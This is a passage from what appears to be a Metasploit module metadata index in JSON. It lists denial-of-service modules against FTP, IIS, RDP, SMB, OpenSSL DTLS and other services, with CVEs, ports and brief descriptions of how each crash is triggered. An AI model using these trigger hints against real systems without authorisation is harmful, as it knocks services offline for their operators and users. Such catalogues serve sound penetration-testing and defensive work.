"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb",
"is_install_path": true,
"ref_name": "dos/smtp/sendmail_prescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/solaris/lpd/cascade_delete": {
"name": "Solaris LPD Arbitrary File Delete",
"full_name": "auxiliary/dos/solaris/lpd/cascade_delete",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Optyx <optyx@uberhax0r.net>"
],
"description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.",
"references": [
"CVE-2005-4797",
"BID-14510",
"OSVDB-18650"
],
"platform": "",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb",
"is_install_path": true,
"ref_name": "dos/solaris/lpd/cascade_delete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/dtls_changecipherspec": {
"name": "OpenSSL DTLS ChangeCipherSpec Remote DoS",
"full_name": "auxiliary/dos/ssl/dtls_changecipherspec",
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
"author": [
"Jon Oberheide <jon@oberheide.org>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.",
"references": [
"CVE-2009-1386",
"OSVDB-55073"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-06 17:42:27 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_changecipherspec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/dtls_fragment_overflow": {
"name": "OpenSSL DTLS Fragment Buffer Overflow DoS",
"full_name": "auxiliary/dos/ssl/dtls_fragment_overflow",
"rank": 300,
"disclosure_date": "2014-06-05",
"type": "auxiliary",
"author": [
"Juri Aedla <asd@ut.ee>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.",
"references": [
"CVE-2014-0195",
"ZDI-14-173",
"BID-67900",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048"
],
"platform": "",
"arch": "",
"rport": 4433,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb",
"is_install_path": true,
"ref_name": "dos/ssl/dtls_fragment_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/ssl/openssl_aesni": {
"name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS",
"full_name": "auxiliary/dos/ssl/openssl_aesni",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
"author": [
"Wolfgang Ettlinger <wolfgang.ettlinger@gmail.com>"
],
"description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.",
"references": [
"CVE-2012-2686",
"URL-https://www.openssl.org/news/secadv/20130205.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb",
"is_install_path": true,
"ref_name": "dos/ssl/openssl_aesni",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/syslog/rsyslog_long_tag": {
"name": "rsyslog Long Tag Off-By-Two DoS",
"full_name": "auxiliary/dos/syslog/rsyslog_long_tag",
"rank": 300,
"disclosure_date": "2011-09-01",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).",
"references": [
"CVE-2011-3200",
"URL-http://www.rsyslog.com/potential-dos-with-malformed-tag/",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644"
],
"platform": "",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb",
"is_install_path": true,
"ref_name": "dos/syslog/rsyslog_long_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/claymore_dos": {
"name": "Claymore Dual GPU Miner Format String dos attack",
"full_name": "auxiliary/dos/tcp/claymore_dos",
"rank": 300,
"disclosure_date": "2018-02-06",
"type": "auxiliary",
"author": [
"res1n",
"bluebird"
],
"description": "Claymores Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.",
"references": [
"CVE-2018-6317",
"EDB-43972",
"URL-https://github.com/nanopool/Claymore-Dual-Miner"
],
"platform": "",
"arch": "",
"rport": 3333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-29 06:09:40 +0000",
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
"is_install_path": true,
"ref_name": "dos/tcp/claymore_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/junos_tcp_opt": {
"name": "Juniper JunOS Malformed TCP Option",
"full_name": "auxiliary/dos/tcp/junos_tcp_opt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.",
"references": [
"BID-37670",
"OSVDB-61538",
"URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb",
"is_install_path": true,
"ref_name": "dos/tcp/junos_tcp_opt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/tcp/synflood": {
"name": "TCP SYN Flooder",
"full_name": "auxiliary/dos/tcp/synflood",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "A simple TCP SYN flooder",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/tcp/synflood.rb",
"is_install_path": true,
"ref_name": "dos/tcp/synflood",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/upnp/miniupnpd_dos": {
"name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit",
"full_name": "auxiliary/dos/upnp/miniupnpd_dos",
"rank": 300,
"disclosure_date": "2013-03-27",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Dejan Lukan"
],
"description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.",
"references": [
"CVE-2013-0229",
"OSVDB-89625",
"BID-57607",
"URL-https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb",
"is_install_path": true,
"ref_name": "dos/upnp/miniupnpd_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/appian/appian_bpm": {
"name": "Appian Enterprise Business Suite 5.6 SP1 DoS",
"full_name": "auxiliary/dos/windows/appian/appian_bpm",
"rank": 300,
"disclosure_date": "2007-12-17",
"type": "auxiliary",
"author": [
"guiness.stout <guinness.stout@gmail.com>"
],
"description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.",
"references": [
"CVE-2007-6509",
"OSVDB-39500",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html"
],
"platform": "",
"arch": "",
"rport": 5400,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb",
"is_install_path": true,
"ref_name": "dos/windows/appian/appian_bpm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/browser/ms09_065_eot_integer": {
"name": "Microsoft Windows EOT Font Table Directory Integer Overflow",
"full_name": "auxiliary/dos/windows/browser/ms09_065_eot_integer",
"rank": 300,
"disclosure_date": "2009-11-10",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.",
"references": [
"CVE-2009-2514",
"MSB-MS09-065",
"OSVDB-59869"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb",
"is_install_path": true,
"ref_name": "dos/windows/browser/ms09_065_eot_integer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/filezilla_admin_user": {
"name": "FileZilla FTP Server Admin Interface Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/filezilla_admin_user",
"rank": 300,
"disclosure_date": "2005-11-07",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.",
"references": [
"BID-15346",
"CVE-2005-3589",
"EDB-1336",
"OSVDB-20817"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_admin_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/filezilla_server_port": {
"name": "FileZilla FTP Server Malformed PORT Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/filezilla_server_port",
"rank": 300,
"disclosure_date": "2006-12-11",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.",
"references": [
"BID-21542",
"BID-21549",
"CVE-2006-6565",
"EDB-2914",
"OSVDB-34435"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_server_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/guildftp_cwdlist": {
"name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption",
"full_name": "auxiliary/dos/windows/ftp/guildftp_cwdlist",
"rank": 300,
"disclosure_date": "2008-10-12",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.",
"references": [
"CVE-2008-4572",
"OSVDB-49045",
"EDB-6738"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/guildftp_cwdlist",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": {
"name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger",
"full_name": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof",
"rank": 300,
"disclosure_date": "2010-12-21",
"type": "auxiliary",
"author": [
"Matthew Bergin",
"jduck <jduck@metasploit.com>"
],
"description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.",
"references": [
"CVE-2010-3972",
"OSVDB-70167",
"BID-45542",
"MSB-MS11-004",
"EDB-15803",
"URL-http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/iis_list_exhaustion": {
"name": "Microsoft IIS FTP Server LIST Stack Exhaustion",
"full_name": "auxiliary/dos/windows/ftp/iis_list_exhaustion",
"rank": 300,
"disclosure_date": "2009-09-03",
"type": "auxiliary",
"author": [
"Kingcope",
"Myo Soe"
],
"description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.",
"references": [
"CVE-2009-2521",
"BID-36273",
"OSVDB-57753",
"MSB-MS09-053",
"URL-https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis_list_exhaustion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/solarftp_user": {
"name": "Solar FTP Server Malformed USER Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/solarftp_user",
"rank": 300,
"disclosure_date": "2011-02-22",
"type": "auxiliary",
"author": [
"x000 <3d3n@hotmail.com.br>",
"C4SS!0 G0M3S <Louredo_@hotmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.",
"references": [
"EDB-16204"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/solarftp_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/titan626_site": {
"name": "Titan FTP Server 6.26.630 SITE WHO DoS",
"full_name": "auxiliary/dos/windows/ftp/titan626_site",
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.",
"references": [
"CVE-2008-6082",
"OSVDB-49177",
"EDB-6753"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/titan626_site",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/vicftps50_list": {
"name": "Victory FTP Server 5.0 LIST DoS",
"full_name": "auxiliary/dos/windows/ftp/vicftps50_list",
"rank": 300,
"disclosure_date": "2008-10-24",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command",
"references": [
"CVE-2008-2031",
"CVE-2008-6829",
"OSVDB-44608",
"EDB-6834"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/vicftps50_list",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/winftp230_nlst": {
"name": "WinFTP 2.3.0 NLST Denial of Service",
"full_name": "auxiliary/dos/windows/ftp/winftp230_nlst",
"rank": 300,
"disclosure_date": "2008-09-26",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.",
"references": [
"CVE-2008-5666",
"OSVDB-49043",
"EDB-6581"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/winftp230_nlst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ftp/xmeasy560_nlst": {
"name": "XM Easy Personal FTP Server 5.6.0 NLST DoS",
"full_name": "auxiliary/dos/windows/ftp/xmeasy560_nlst",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
"EDB-6741"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy560_nlst",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/ftp/xmeasy570_nlst": {
"name": "XM Easy Personal FTP Server 5.7.0 NLST DoS",
"full_name": "auxiliary/dos/windows/ftp/xmeasy570_nlst",
"rank": 300,
"disclosure_date": "2009-03-27",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
"EDB-8294"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy570_nlst",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_dos/windows/games/kaillera": {
"name": "Kaillera 0.86 Server Denial of Service",
"full_name": "auxiliary/dos/windows/games/kaillera",
"rank": 300,
"disclosure_date": "2011-07-02",
"type": "auxiliary",
"author": [
"Sil3nt_Dre4m"
],
"description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.",
"references": [
],
"platform": "",
"arch": "",
"rport": 27888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/games/kaillera.rb",
"is_install_path": true,
"ref_name": "dos/windows/games/kaillera",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": {
"name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service",
"full_name": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos",
"rank": 300,
"disclosure_date": "2010-09-14",
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>",
"Leandro Oliveira <leadro@alligatorteam.org>"
],
"description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.",
"references": [
"CVE-2010-1899",
"OSVDB-67978",
"MSB-MS10-065",
"EDB-15167"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/ms10_065_ii6_asp_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/http/pi3web_isapi": {
"name": "Pi3Web ISAPI DoS",
"full_name": "auxiliary/dos/windows/http/pi3web_isapi",
"rank": 300,
"disclosure_date": "2008-11-13",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.",
"references": [
"CVE-2008-6938",
"OSVDB-49998",
"EDB-7109"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/pi3web_isapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/llmnr/ms11_030_dnsapi": {
"name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS",
"full_name": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi",
"rank": 300,
"disclosure_date": "2011-04-12",
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.",
"references": [
"CVE-2011-0657",
"OSVDB-71780",
"MSB-MS11-030"
],
"platform": "",
"arch": "",
"rport": 5355,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/llmnr/ms11_030_dnsapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/nat/nat_helper": {
"name": "Microsoft Windows NAT Helper Denial of Service",
"full_name": "auxiliary/dos/windows/nat/nat_helper",
"rank": 300,
"disclosure_date": "2006-10-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.",
"references": [
"OSVDB-30096",
"BID-20804",
"CVE-2006-5614"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb",
"is_install_path": true,
"ref_name": "dos/windows/nat/nat_helper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/rdp/ms12_020_maxchannelids": {
"name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS",
"full_name": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids",
"rank": 300,
"disclosure_date": "2012-03-16",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"Daniel Godas-Lopez",
"Alex Ionescu",
"jduck <jduck@metasploit.com>",
"#ms12-020"
],
"description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.",
"references": [
"CVE-2012-0002",
"MSB-MS12-020",
"URL-http://www.privatepaste.com/ffe875e04a",
"URL-http://pastie.org/private/4egcqt9nucxnsiksudy5dw",
"URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
"URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
"EDB-18606",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
],
"platform": "",
"arch": "",
"rport": 3389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
"is_install_path": true,
"ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms05_047_pnp": {
"name": "Microsoft Plug and Play Service Registry Overflow",
"full_name": "auxiliary/dos/windows/smb/ms05_047_pnp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.",
"references": [
"CVE-2005-2120",
"MSB-MS05-047",
"BID-15065",
"OSVDB-18830"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms05_047_pnp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
